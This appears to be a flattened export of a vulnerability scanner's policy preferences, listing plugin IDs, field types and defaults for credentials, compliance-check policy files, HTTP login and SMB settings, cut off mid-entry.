+ Database settings + 33815 + Database settings[entry]:Database SID : + Database SID : + entry + + + + + Database settings + 33815 + Database settings[entry]:Database port to use : + Database port to use : + entry + + + + + Database settings + 33815 + Database settings[entry]:Login : + Login : + entry + + + + + Database settings + 33815 + Database settings[password]:Password : + Password : + password + + + + + Database settings + 33815 + Database settings[radio]:Oracle auth type: + Oracle auth type: + radio + NORMAL;SYSOPER;SYSDBA + NORMAL;SYSOPER;SYSDBA + + + Database settings + 33815 + Database settings[radio]:SQL Server auth type: + SQL Server auth type: + radio + Windows;SQL + Windows;SQL + + + Database settings + 33815 + Database settings[radio]:Sybase ASE auth type: + Sybase ASE auth type: + radio + RSA;Plain Text + RSA;Plain Text + + + Database settings + 33815 + Database settings[radio]:Additional DB Type (1) : + Additional DB Type (1) : + radio + Oracle;SQL Server;MySQL;DB2;Informix/DRDA;PostgreSQL;Sybase ASE + Oracle;SQL Server;MySQL;DB2;Informix/DRDA;PostgreSQL;Sybase ASE + + + Database settings + 33815 + Database settings[radio]:Additional Database service type (1) : + Additional Database service type (1) : + radio + SID;SERVICE_NAME + SID;SERVICE_NAME + + + Database settings + 33815 + Database settings[entry]:Additional Database SID (1) : + Additional Database SID (1) : + entry + + + + + Database settings + 33815 + Database settings[entry]:Additional Database port to use (1) : + Additional Database port to use (1) : + entry + + + + + Database settings + 33815 + Database settings[entry]:Additional Login (1) : + Additional Login (1) : + entry + + + + + Database settings + 33815 + Database settings[password]:Additional Password (1) : + Additional Password (1) : + password + + + + + Database settings + 33815 + Database settings[radio]:Additional Oracle auth type (1) : + Additional Oracle auth type (1) : + radio + NORMAL;SYSOPER;SYSDBA + NORMAL;SYSOPER;SYSDBA + + + Database settings + 33815 + Database settings[radio]:Additional SQL Server auth type (1) : + Additional SQL Server auth type (1) : + radio + Windows;SQL + Windows;SQL + + + Database settings + 33815 + Database settings[radio]:Additional Sybase ASE auth type (1) : + Additional Sybase ASE auth type (1) : + radio + RSA;Plain Text + RSA;Plain Text + + + Database settings + 33815 + Database settings[radio]:Additional DB Type (2) : + Additional DB Type (2) : + radio + Oracle;SQL Server;MySQL;DB2;Informix/DRDA;PostgreSQL;Sybase ASE + Oracle;SQL Server;MySQL;DB2;Informix/DRDA;PostgreSQL;Sybase ASE + + + Database settings + 33815 + Database settings[radio]:Additional Database service type (2) : + Additional Database service type (2) : + radio + SID;SERVICE_NAME + SID;SERVICE_NAME + + + Database settings + 33815 + Database settings[entry]:Additional Database SID (2) : + Additional Database SID (2) : + entry + + + + + Database settings + 33815 + Database settings[entry]:Additional Database port to use (2) : + Additional Database port to use (2) : + entry + + + + + Database settings + 33815 + Database settings[entry]:Additional Login (2) : + Additional Login (2) : + entry + + + + + Database settings + 33815 + Database settings[password]:Additional Password (2) : + Additional Password (2) : + password + + + + + Database settings + 33815 + Database settings[radio]:Additional Oracle auth type (2) : + Additional Oracle auth type (2) : + radio + NORMAL;SYSOPER;SYSDBA + NORMAL;SYSOPER;SYSDBA + + + Database settings + 33815 + Database settings[radio]:Additional SQL Server auth type (2) : + Additional SQL Server auth type (2) : + radio + Windows;SQL + Windows;SQL + + + Database settings + 33815 + Database settings[radio]:Additional Sybase ASE auth type (2) : + Additional Sybase ASE auth type (2) : + radio + RSA;Plain Text + RSA;Plain Text + + + Database settings + 33815 + Database settings[radio]:Additional DB Type (3) : + Additional DB Type (3) : + radio + Oracle;SQL Server;MySQL;DB2;Informix/DRDA;PostgreSQL;Sybase ASE + Oracle;SQL Server;MySQL;DB2;Informix/DRDA;PostgreSQL;Sybase ASE + + + Database settings + 33815 + Database settings[radio]:Additional Database service type (3) : + Additional Database service type (3) : + radio + SID;SERVICE_NAME + SID;SERVICE_NAME + + + Database settings + 33815 + Database settings[entry]:Additional Database SID (3) : + Additional Database SID (3) : + entry + + + + + Database settings + 33815 + Database settings[entry]:Additional Database port to use (3) : + Additional Database port to use (3) : + entry + + + + + Database settings + 33815 + Database settings[entry]:Additional Login (3) : + Additional Login (3) : + entry + + + + + Database settings + 33815 + Database settings[password]:Additional Password (3) : + Additional Password (3) : + password + + + + + Database settings + 33815 + Database settings[radio]:Additional Oracle auth type (3) : + Additional Oracle auth type (3) : + radio + NORMAL;SYSOPER;SYSDBA + NORMAL;SYSOPER;SYSDBA + + + Database settings + 33815 + Database settings[radio]:Additional SQL Server auth type (3) : + Additional SQL Server auth type (3) : + radio + Windows;SQL + Windows;SQL + + + Database settings + 33815 + Database settings[radio]:Additional Sybase ASE auth type (3) : + Additional Sybase ASE auth type (3) : + radio + RSA;Plain Text + RSA;Plain Text + + + Database settings + 33815 + Database settings[radio]:Additional DB Type (4) : + Additional DB Type (4) : + radio + Oracle;SQL Server;MySQL;DB2;Informix/DRDA;PostgreSQL;Sybase ASE + Oracle;SQL Server;MySQL;DB2;Informix/DRDA;PostgreSQL;Sybase ASE + + + Database settings + 33815 + Database settings[radio]:Additional Database service type (4) : + Additional Database service type (4) : + radio + SID;SERVICE_NAME + SID;SERVICE_NAME + + + Database settings + 33815 + Database settings[entry]:Additional Database SID (4) : + Additional Database SID (4) : + entry + + + + + Database settings + 33815 + Database settings[entry]:Additional Database port to use (4) : + Additional Database port to use (4) : + entry + + + + + Database settings + 33815 + Database settings[entry]:Additional Login (4) : + Additional Login (4) : + entry + + + + + Database settings + 33815 + Database settings[password]:Additional Password (4) : + Additional Password (4) : + password + + + + + Database settings + 33815 + Database settings[radio]:Additional Oracle auth type (4) : + Additional Oracle auth type (4) : + radio + NORMAL;SYSOPER;SYSDBA + NORMAL;SYSOPER;SYSDBA + + + Database settings + 33815 + Database settings[radio]:Additional SQL Server auth type (4) : + Additional SQL Server auth type (4) : + radio + Windows;SQL + Windows;SQL + + + Database settings + 33815 + Database settings[radio]:Additional Sybase ASE auth type (4) : + Additional Sybase ASE auth type (4) : + radio + RSA;Plain Text + RSA;Plain Text + + + Dell Force10 FTOS Compliance Checks + 72461 + Dell Force10 FTOS Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Dell Force10 FTOS Compliance Checks + 72461 + Dell Force10 FTOS Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Dell Force10 FTOS Compliance Checks + 72461 + Dell Force10 FTOS Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Dell Force10 FTOS Compliance Checks + 72461 + Dell Force10 FTOS Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Dell Force10 FTOS Compliance Checks + 72461 + Dell Force10 FTOS Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Dell Force10 FTOS Compliance Checks + 72461 + Dell Force10 FTOS Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + Patch Management: Dell KACE K1000 Settings + 76866 + Patch Management: Dell KACE K1000 Settings[entry]:K1000 Address : + K1000 Address : + entry + + + + + Patch Management: Dell KACE K1000 Settings + 76866 + Patch Management: Dell KACE K1000 Settings[entry]:K1000 Database Port : + K1000 Database Port : + entry + 3306 + 3306 + + + Patch Management: Dell KACE K1000 Settings + 76866 + Patch Management: Dell KACE K1000 Settings[entry]:K1000 Organization Database Name : + + K1000 Organization Database Name : + entry + ORG1 + ORG1 + + + Patch Management: Dell KACE K1000 Settings + 76866 + Patch Management: Dell KACE K1000 Settings[entry]:K1000 Database Username : + K1000 Database Username : + entry + R1 + R1 + + + Patch Management: Dell KACE K1000 Settings + 76866 + Patch Management: Dell KACE K1000 Settings[password]:K1000 Database Password : + K1000 Database Password : + password + + + + + Do not scan fragile devices + 22481 + Do not scan fragile devices[checkbox]:Scan Network Printers + Scan Network Printers + checkbox + no + no + + + Do not scan fragile devices + 22481 + Do not scan fragile devices[checkbox]:Scan Novell Netware hosts + Scan Novell Netware hosts + checkbox + no + no + + + Do not scan fragile devices + 22481 + Do not scan fragile devices[checkbox]:Scan Operational Technology devices + Scan Operational Technology devices + checkbox + yes + yes + + + Extreme ExtremeXOS Compliance Checks + 73156 + Extreme ExtremeXOS Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Extreme ExtremeXOS Compliance Checks + 73156 + Extreme ExtremeXOS Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Extreme ExtremeXOS Compliance Checks + 73156 + Extreme ExtremeXOS Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Extreme ExtremeXOS Compliance Checks + 73156 + Extreme ExtremeXOS Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Extreme ExtremeXOS Compliance Checks + 73156 + Extreme ExtremeXOS Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Extreme ExtremeXOS Compliance Checks + 73156 + Extreme ExtremeXOS Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + F5 Compliance Checks + 95388 + F5 Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + F5 Compliance Checks + 95388 + F5 Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + F5 Compliance Checks + 95388 + F5 Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + F5 Compliance Checks + 95388 + F5 Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + F5 Compliance Checks + 95388 + F5 Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + F5 Settings + 95387 + F5 Settings[entry]:Username : + Username : + entry + + + + + F5 Settings + 95387 + F5 Settings[password]:Password : + Password : + password + + + + + F5 Settings + 95387 + F5 Settings[entry]:Port : + Port : + entry + 443 + 443 + + + F5 Settings + 95387 + F5 Settings[checkbox]:SSL : + SSL : + checkbox + yes + yes + + + F5 Settings + 95387 + F5 Settings[checkbox]:Verify SSL Certificate : + Verify SSL Certificate : + checkbox + yes + yes + + + Service Detection + 22964 + Service Detection[radio]:Test SSL based services + Test SSL based services + radio + All ports + All ports + + + FireEye Compliance Checks + 70469 + FireEye Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + FireEye Compliance Checks + 70469 + FireEye Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + FireEye Compliance Checks + 70469 + FireEye Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + FireEye Compliance Checks + 70469 + FireEye Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + FireEye Compliance Checks + 70469 + FireEye Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + FireEye Compliance Checks + 70469 + FireEye Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + Fortigate FortiOS Compliance Checks + 70272 + Fortigate FortiOS Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Fortigate FortiOS Compliance Checks + 70272 + Fortigate FortiOS Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Fortigate FortiOS Compliance Checks + 70272 + Fortigate FortiOS Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Fortigate FortiOS Compliance Checks + 70272 + Fortigate FortiOS Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Fortigate FortiOS Compliance Checks + 70272 + Fortigate FortiOS Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Fortigate FortiOS Compliance Checks + 70272 + Fortigate FortiOS Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + Google Cloud Platform Settings + 150079 + Google Cloud Platform Settings[file]:Service Account JSON Key File : + Service Account JSON Key File : + file + + + + + Google Cloud Platform Compliance Checks + 150078 + Google Cloud Platform Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Google Cloud Platform Compliance Checks + 150078 + Google Cloud Platform Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Google Cloud Platform Compliance Checks + 150078 + Google Cloud Platform Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Google Cloud Platform Compliance Checks + 150078 + Google Cloud Platform Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Google Cloud Platform Compliance Checks + 150078 + Google Cloud Platform Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Generic SSH Compliance Checks + 129714 + Generic SSH Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Generic SSH Compliance Checks + 129714 + Generic SSH Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Generic SSH Compliance Checks + 129714 + Generic SSH Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Generic SSH Compliance Checks + 129714 + Generic SSH Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Generic SSH Compliance Checks + 129714 + Generic SSH Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Global variable settings + 12288 + Global variable settings[checkbox]:Probe services on every port + Probe services on every port + checkbox + yes + yes + + + Global variable settings + 12288 + Global variable settings[checkbox]:Do not log in with user accounts not specified in the + policy + + Do not log in with user accounts not specified in the policy + checkbox + yes + yes + + + Global variable settings + 12288 + Global variable settings[checkbox]:Enable CGI scanning + Enable CGI scanning + checkbox + no + yes + + + Global variable settings + 12288 + Global variable settings[radio]:Network type + Network type + radio + Mixed (use RFC 1918);Private LAN;Public WAN (Internet) + Mixed (use RFC 1918) + + + Global variable settings + 12288 + Global variable settings[checkbox]:Enable experimental scripts + Enable experimental scripts + checkbox + no + no + + + Global variable settings + 12288 + Global variable settings[checkbox]:Thorough tests (slow) + Thorough tests (slow) + checkbox + no + no + + + Global variable settings + 12288 + Global variable settings[radio]:Report verbosity + Report verbosity + radio + Normal;Quiet;Verbose + Normal + + + Global variable settings + 12288 + Global variable settings[radio]:Report paranoia + Report paranoia + radio + Normal;Avoid false alarms;Paranoid (more false alarms) + Normal + + + Global variable settings + 12288 + Global variable settings[entry]:HTTP User-Agent + HTTP User-Agent + entry + Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) + Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) + + + Global variable settings + 12288 + Global variable settings[file]:SSL certificate to use : + SSL certificate to use : + file + + + + + Global variable settings + 12288 + Global variable settings[file]:SSL CA to trust : + SSL CA to trust : + file + + + + + Global variable settings + 12288 + Global variable settings[file]:SSL key to use : + SSL key to use : + file + + + + + Global variable settings + 12288 + Global variable settings[password]:SSL password for SSL key : + SSL password for SSL key : + password + + + + + Global variable settings + 12288 + Global variable settings[checkbox]:Enumerate all SSL ciphers + Enumerate all SSL ciphers + checkbox + yes + yes + + + Global variable settings + 12288 + Global variable settings[checkbox]:Enable CRL checking (connects to Internet) + Enable CRL checking (connects to Internet) + checkbox + no + no + + + Global variable settings + 12288 + Global variable settings[checkbox]:Enable plugin debugging + Enable plugin debugging + checkbox + no + no + + + Global variable settings + 12288 + Global variable settings[entry]:Java ARchive Detection Path : + Java ARchive Detection Path : + entry + + + + + Good MDM Settings + 66963 + Good MDM Settings[entry]:GMC Server : + GMC Server : + entry + + + + + Good MDM Settings + 66963 + Good MDM Settings[entry]:Port : + Port : + entry + + + + + Good MDM Settings + 66963 + Good MDM Settings[entry]:Domain : + Domain : + entry + + + + + Good MDM Settings + 66963 + Good MDM Settings[entry]:Username : + Username : + entry + + + + + Good MDM Settings + 66963 + Good MDM Settings[password]:Password : + Password : + password + + + + + Good MDM Settings + 66963 + Good MDM Settings[checkbox]:SSL : + SSL : + checkbox + yes + yes + + + Good MDM Settings + 66963 + Good MDM Settings[checkbox]:Verify SSL Certificate : + Verify SSL Certificate : + checkbox + no + no + + + Hosts File Whitelisted Entries + 73980 + Hosts File Whitelisted Entries[file]:Upload file with custom hosts entries : + Upload file with custom hosts entries : + file + + + + + HP ProCurve Compliance Checks + 70271 + HP ProCurve Compliance Checks[radio]:HP ProCurve File To Audit : + HP ProCurve File To Audit : + radio + Saved/(show config);Default/(show default-config);Running/(show running-config) + + Saved/(show config);Default/(show default-config);Running/(show running-config) + + + + HP ProCurve Compliance Checks + 70271 + HP ProCurve Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + HP ProCurve Compliance Checks + 70271 + HP ProCurve Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + HP ProCurve Compliance Checks + 70271 + HP ProCurve Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + HP ProCurve Compliance Checks + 70271 + HP ProCurve Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + HP ProCurve Compliance Checks + 70271 + HP ProCurve Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + HP ProCurve Compliance Checks + 70271 + HP ProCurve Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + HTTP cookies import + 42893 + HTTP cookies import[file]:Cookies file : + Cookies file : + file + + + + + HTTP login page + 11149 + HTTP login page[entry]:Login page : + Login page : + entry + / + / + + + HTTP login page + 11149 + HTTP login page[entry]:Login form : + Login form : + entry + + + + + HTTP login page + 11149 + HTTP login page[entry]:Login form fields : + Login form fields : + entry + user=%USER%&pass=%PASS% + user=%USER%&pass=%PASS% + + + HTTP login page + 11149 + HTTP login page[radio]:Login form method : + Login form method : + radio + POST;GET + POST + + + HTTP login page + 11149 + HTTP login page[checkbox]:Automated login page search + Automated login page search + checkbox + no + no + + + HTTP login page + 11149 + HTTP login page[entry]:Re-authenticate delay (seconds) : + Re-authenticate delay (seconds) : + entry + + + + + HTTP login page + 11149 + HTTP login page[entry]:Check authentication on page : + Check authentication on page : + entry + + + + + HTTP login page + 11149 + HTTP login page[entry]:Follow 30x redirections (# of levels) : + Follow 30x redirections (# of levels) : + entry + 2 + 0 + + + HTTP login page + 11149 + HTTP login page[entry]:Authenticated regex : + Authenticated regex : + entry + + + + + HTTP login page + 11149 + HTTP login page[checkbox]:Invert test (disconnected if regex matches) + Invert test (disconnected if regex matches) + checkbox + no + no + + + HTTP login page + 11149 + HTTP login page[checkbox]:Match regex on HTTP headers + Match regex on HTTP headers + checkbox + no + no + + + HTTP login page + 11149 + HTTP login page[checkbox]:Case insensitive regex + Case insensitive regex + checkbox + no + no + + + HTTP login page + 11149 + HTTP login page[checkbox]:Abort web application tests if login fails + Abort web application tests if login fails + checkbox + no + no + + + Remote web server screenshot + 59861 + Remote web server screenshot[checkbox]:Allow Nessus to connect to the cloud to take a + screenshot of the public targets + + Allow Nessus to connect to the cloud to take a screenshot of the public targets + + checkbox + no + no + + + Huawei VRP Compliance Checks + 73157 + Huawei VRP Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Huawei VRP Compliance Checks + 73157 + Huawei VRP Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Huawei VRP Compliance Checks + 73157 + Huawei VRP Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Huawei VRP Compliance Checks + 73157 + Huawei VRP Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Huawei VRP Compliance Checks + 73157 + Huawei VRP Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Huawei VRP Compliance Checks + 73157 + Huawei VRP Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + Patch Management: IBM Tivoli Endpoint Manager Server Settings + 62558 + Patch Management: IBM Tivoli Endpoint Manager Server Settings[entry]:Web Reports Server + : + + Web Reports Server : + entry + + + + + Patch Management: IBM Tivoli Endpoint Manager Server Settings + 62558 + Patch Management: IBM Tivoli Endpoint Manager Server Settings[entry]:Web Reports Port : + + Web Reports Port : + entry + + + + + Patch Management: IBM Tivoli Endpoint Manager Server Settings + 62558 + Patch Management: IBM Tivoli Endpoint Manager Server Settings[entry]:Web Reports Username + : + + Web Reports Username : + entry + + + + + Patch Management: IBM Tivoli Endpoint Manager Server Settings + 62558 + Patch Management: IBM Tivoli Endpoint Manager Server Settings[password]:Web Reports + Password : + + Web Reports Password : + password + + + + + Patch Management: IBM Tivoli Endpoint Manager Server Settings + 62558 + Patch Management: IBM Tivoli Endpoint Manager Server Settings[checkbox]:SSL : + SSL : + checkbox + no + no + + + Patch Management: IBM Tivoli Endpoint Manager Server Settings + 62558 + Patch Management: IBM Tivoli Endpoint Manager Server Settings[checkbox]:Verify SSL + Certificate : + + Verify SSL Certificate : + checkbox + no + no + + + Intune Settings + 125030 + Intune Settings[entry]:Intune Tenant : + Intune Tenant : + entry + + + + + Intune Settings + 125030 + Intune Settings[entry]:Intune Client : + Intune Client : + entry + + + + + Intune Settings + 125030 + Intune Settings[password]:Intune Secret : + Intune Secret : + password + + + + + Intune Settings + 125030 + Intune Settings[entry]:Intune Username : + Intune Username : + entry + + + + + Intune Settings + 125030 + Intune Settings[password]:Intune Password : + Intune Password : + password + + + + + Active Outbound Connection to Host Listed in Known Bot Database + 58430 + Active Outbound Connection to Host Listed in Known Bot Database[file]:Custom Netstat IP + Threat List : + + Custom Netstat IP Threat List : + file + + + + + Active Connection to or from Host Listed in Custom Netstat IP Threat List + 147190 + Active Connection to or from Host Listed in Custom Netstat IP Threat List[file]:Custom + Netstat IP Threat List : + + Custom Netstat IP Threat List : + file + + + + + IBM iSeries Credentials + 57861 + IBM iSeries Credentials[entry]:Login : + Login : + entry + + + + + IBM iSeries Credentials + 57861 + IBM iSeries Credentials[password]:Password : + Password : + password + + + + + IBM iSeries Compliance Checks + 57860 + IBM iSeries Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + IBM iSeries Compliance Checks + 57860 + IBM iSeries Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + IBM iSeries Compliance Checks + 57860 + IBM iSeries Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + IBM iSeries Compliance Checks + 57860 + IBM iSeries Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + IBM iSeries Compliance Checks + 57860 + IBM iSeries Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Juniper Junos Compliance Checks + 62680 + Juniper Junos Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Juniper Junos Compliance Checks + 62680 + Juniper Junos Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Juniper Junos Compliance Checks + 62680 + Juniper Junos Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Juniper Junos Compliance Checks + 62680 + Juniper Junos Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Juniper Junos Compliance Checks + 62680 + Juniper Junos Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + Juniper Junos Compliance Checks + 62680 + Juniper Junos Compliance Checks[file]:Offline config file (.txt or .zip) : + Offline config file (.txt or .zip) : + file + + + + + Kerberos configuration + 17351 + Kerberos configuration[entry]:Kerberos Key Distribution Center (KDC) : + Kerberos Key Distribution Center (KDC) : + entry + + + + + Kerberos configuration + 17351 + Kerberos configuration[entry]:Kerberos KDC Port : + Kerberos KDC Port : + entry + 88 + 88 + + + Kerberos configuration + 17351 + Kerberos configuration[radio]:Kerberos KDC Transport : + Kerberos KDC Transport : + radio + tcp + tcp + + + Kerberos configuration + 17351 + Kerberos configuration[entry]:Kerberos Realm (SSH only) : + Kerberos Realm (SSH only) : + entry + + + + + LDAP 'Domain Admins' Group Membership Enumeration + 58038 + LDAP 'Domain Admins' Group Membership Enumeration[entry]:LDAP user : + LDAP user : + entry + + + + + LDAP 'Domain Admins' Group Membership Enumeration + 58038 + LDAP 'Domain Admins' Group Membership Enumeration[password]:LDAP password : + + LDAP password : + password + + + + + LDAP 'Domain Admins' Group Membership Enumeration + 58038 + LDAP 'Domain Admins' Group Membership Enumeration[entry]:Max results : + + Max results : + entry + 1000 + 1000 + + + Login configurations + 10870 + Login configurations[entry]:HTTP account : + HTTP account : + entry + + + + + Login configurations + 10870 + Login configurations[password]:HTTP password (sent in clear) : + HTTP password (sent in clear) : + password + + + + + Login configurations + 10870 + Login configurations[entry]:NNTP account : + NNTP account : + entry + + + + + Login configurations + 10870 + Login configurations[password]:NNTP password (sent in clear) : + NNTP password (sent in clear) : + password + + + + + Login configurations + 10870 + Login configurations[entry]:FTP account : + FTP account : + entry + anonymous + anonymous + + + Login configurations + 10870 + Login configurations[password]:FTP password (sent in clear) : + FTP password (sent in clear) : + password + nessus@nessus.org + ********* + + + Login configurations + 10870 + Login configurations[entry]:FTP writeable directory : + FTP writeable directory : + entry + /incoming + /incoming + + + Login configurations + 10870 + Login configurations[entry]:POP2 account : + POP2 account : + entry + + + + + Login configurations + 10870 + Login configurations[password]:POP2 password (sent in clear) : + POP2 password (sent in clear) : + password + + + + + Login configurations + 10870 + Login configurations[entry]:POP3 account : + POP3 account : + entry + + + + + Login configurations + 10870 + Login configurations[password]:POP3 password (sent in clear) : + POP3 password (sent in clear) : + password + + + + + Login configurations + 10870 + Login configurations[entry]:IMAP account : + IMAP account : + entry + + + + + Login configurations + 10870 + Login configurations[password]:IMAP password (sent in clear) : + IMAP password (sent in clear) : + password + + + + + Login configurations + 10870 + Login configurations[entry]:IPMI account : + IPMI account : + entry + + + + + Login configurations + 10870 + Login configurations[password]:IPMI password (sent in clear) : + IPMI password (sent in clear) : + password + + + + + Login configurations + 10870 + Login configurations[entry]:SMB account : + SMB account : + entry + + + + + Login configurations + 10870 + Login configurations[password]:SMB password : + SMB password : + password + + + + + Login configurations + 10870 + Login configurations[entry]:SMB domain (optional) : + SMB domain (optional) : + entry + + + + + Login configurations + 10870 + Login configurations[radio]:SMB password type : + SMB password type : + radio + Password;LM Hash;NTLM Hash + Password;LM Hash;NTLM Hash + + + Login configurations + 10870 + Login configurations[entry]:Additional SMB account (1) : + Additional SMB account (1) : + entry + + + + + Login configurations + 10870 + Login configurations[password]:Additional SMB password (1) : + Additional SMB password (1) : + password + + + + + Login configurations + 10870 + Login configurations[entry]:Additional SMB domain (optional) (1) : + Additional SMB domain (optional) (1) : + entry + + + + + Login configurations + 10870 + Login configurations[entry]:Additional SMB account (2) : + Additional SMB account (2) : + entry + + + + + Login configurations + 10870 + Login configurations[password]:Additional SMB password (2) : + Additional SMB password (2) : + password + + + + + Login configurations + 10870 + Login configurations[entry]:Additional SMB domain (optional) (2) : + Additional SMB domain (optional) (2) : + entry + + + + + Login configurations + 10870 + Login configurations[entry]:Additional SMB account (3) : + Additional SMB account (3) : + entry + + + + + Login configurations + 10870 + Login configurations[password]:Additional SMB password (3) : + Additional SMB password (3) : + password + + + + + Login configurations + 10870 + Login configurations[entry]:Additional SMB domain (optional) (3) : + Additional SMB domain (optional) (3) : + entry + + + + + Login configurations + 10870 + Login configurations[checkbox]:Never send SMB credentials in clear text + Never send SMB credentials in clear text + checkbox + yes + yes + + + Login configurations + 10870 + Login configurations[checkbox]:Only use NTLMv2 + Only use NTLMv2 + checkbox + no + yes + + + Login configurations + 10870 + Login configurations[checkbox]:Only use Kerberos authentication for SMB + Only use Kerberos authentication for SMB + checkbox + no + no + + + MaaS360 Settings + 92000 + MaaS360 Settings[entry]:Username : + Username : + entry + + + + + MaaS360 Settings + 92000 + MaaS360 Settings[password]:Password : + Password : + password + + + + + MaaS360 Settings + 92000 + MaaS360 Settings[entry]:Root URL : + Root URL : + entry + + + + + MaaS360 Settings + 92000 + MaaS360 Settings[entry]:Platform ID : + Platform ID : + entry + + + + + MaaS360 Settings + 92000 + MaaS360 Settings[entry]:Billing ID : + Billing ID : + entry + + + + + MaaS360 Settings + 92000 + MaaS360 Settings[entry]:App ID : + App ID : + entry + + + + + MaaS360 Settings + 92000 + MaaS360 Settings[entry]:App version : + App version : + entry + + + + + MaaS360 Settings + 92000 + MaaS360 Settings[entry]:App access key : + App access key : + entry + + + + + Mobile Device Manager Compliance Checks + 81914 + Mobile Device Manager Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + Mobile Device Manager Compliance Checks + 81914 + Mobile Device Manager Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + Mobile Device Manager Compliance Checks + 81914 + Mobile Device Manager Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + Mobile Device Manager Compliance Checks + 81914 + Mobile Device Manager Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + Mobile Device Manager Compliance Checks + 81914 + Mobile Device Manager Compliance Checks[file]:Policy file #5 : + Policy file #5 : + file + + + + + MobileIron API Settings + 72904 + MobileIron API Settings[entry]:MobileIron VSP Admin Portal URL : + MobileIron VSP Admin Portal URL : + entry + + + + + MobileIron API Settings + 72904 + MobileIron API Settings[entry]:MobileIron VSP Admin Portal Port : + MobileIron VSP Admin Portal Port : + entry + + + + + MobileIron API Settings + 72904 + MobileIron API Settings[entry]:MobileIron port : + MobileIron port : + entry + + + + + MobileIron API Settings + 72904 + MobileIron API Settings[entry]:MobileIron username : + MobileIron username : + entry + + + + + MobileIron API Settings + 72904 + MobileIron API Settings[password]:MobileIron password : + MobileIron password : + password + + + + + MobileIron API Settings + 72904 + MobileIron API Settings[checkbox]:SSL : + SSL : + checkbox + yes + yes + + + MobileIron API Settings + 72904 + MobileIron API Settings[checkbox]:Verify SSL certificate : + Verify SSL certificate : + checkbox + no + no + + + MongoDB Compliance Checks + 76513 + MongoDB Compliance Checks[file]:Policy file #1 : + Policy file #1 : + file + + + + + MongoDB Compliance Checks + 76513 + MongoDB Compliance Checks[file]:Policy file #2 : + Policy file #2 : + file + + + + + MongoDB Compliance Checks + 76513 + MongoDB Compliance Checks[file]:Policy file #3 : + Policy file #3 : + file + + + + + MongoDB Compliance Checks + 76513 + MongoDB Compliance Checks[file]:Policy file #4 : + Policy file #4 : + file + + + + + MongoDB Compliance Checks + 76513 + MongoDB Compliance 